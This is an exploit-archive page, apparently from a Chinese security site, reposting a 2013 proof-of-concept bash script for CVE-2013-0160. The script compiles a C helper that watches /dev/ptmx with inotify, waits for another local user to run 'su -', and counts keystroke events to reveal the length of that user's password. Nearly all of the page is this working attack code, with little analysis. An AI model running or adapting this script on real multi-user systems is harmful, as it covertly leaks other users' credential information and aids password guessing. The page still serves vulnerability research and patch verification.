首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel /dev/ptmx Key Stroke Timing Local Disclosure
来源:http://vladz.devzero.fr 作者:vladz 发布时间:2013-02-06  

#!/bin/bash
# ptmx-su-pwdlen.sh -- This PoC determine the password length of a local
# user who runs "su -".  Done thanks to the ptmx keystroke timing attack
# (CVE-2013-0160). See http://vladz.devzero.fr/013_ptmx-timing.php for
# more information. 
#
# Tested on Debian 6.0.5 (kernel 2.6.32-5-amd64).
#
# "THE BEER-WARE LICENSE" (Revision 42):
# <vladz@devzero.fr> wrote this file. As long as you retain this notice
# you can do whatever you want with this stuff. If we meet some day, and
# you think this stuff is worth it, you can buy me a beer in return. -V.

if ps -e -o cmd= | egrep -q "^(-|^)su"; then
  echo "[-] Kill/close all running \"su\" session before using this PoC"
  exit 1
fi

exe=$(mktemp) || exit 1
tmp=$(mktemp) || exit 1

cat > ${exe}.c << _EOF_
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <sys/inotify.h>

static int count = 0;

void display_result() {

  printf("[+] password len is %d\n", count-1);
  _exit(0);
}

int main() {

  int fd;
  char buf[1024];

  signal(SIGINT, display_result);

  fd = inotify_init();
  inotify_add_watch(fd, "/dev/ptmx", IN_MODIFY);

  while(read(fd, buf, 1024)) count++;

  return 0;
}
_EOF_

cc -o ${exe}{,.c}

echo "[*] Wait for someone to run \"su -\""

while true; do

  ps -e -o cmd= | egrep "^(-|^)su" >${tmp}
  x=$(wc -l ${tmp})

  case ${x% *} in

    1) (( run )) && continue;
       echo -n "[+] su detected, full command: "
       cat ${tmp}; ${exe} &
       (( run = 1 ))  ;;

    2) [ ! -z "$!" ] && kill -2 $!; break ;;

  esac

done

rm -f ${exe}{,.c} ${tmp}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Portable UPnP SDK unique_servi
·VMWare OVF Tools Format String
·FreeBSD 9.1 ftpd Remote Denial
·ActFax 5.01 RAW Server Buffer
·Opera SVG Use After Free Vulne
·cURL Buffer Overflow Vulnerabi
·DataLife Engine preview.php PH
·MS13-005 Proof Of Concept
·Oracle Automated Service Manag
·VLC Player 2.0.4 <= Arbitrary
·Inter-Keystroke Timing Proof O
·D-LINK DIR-300 / DIR-600 Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved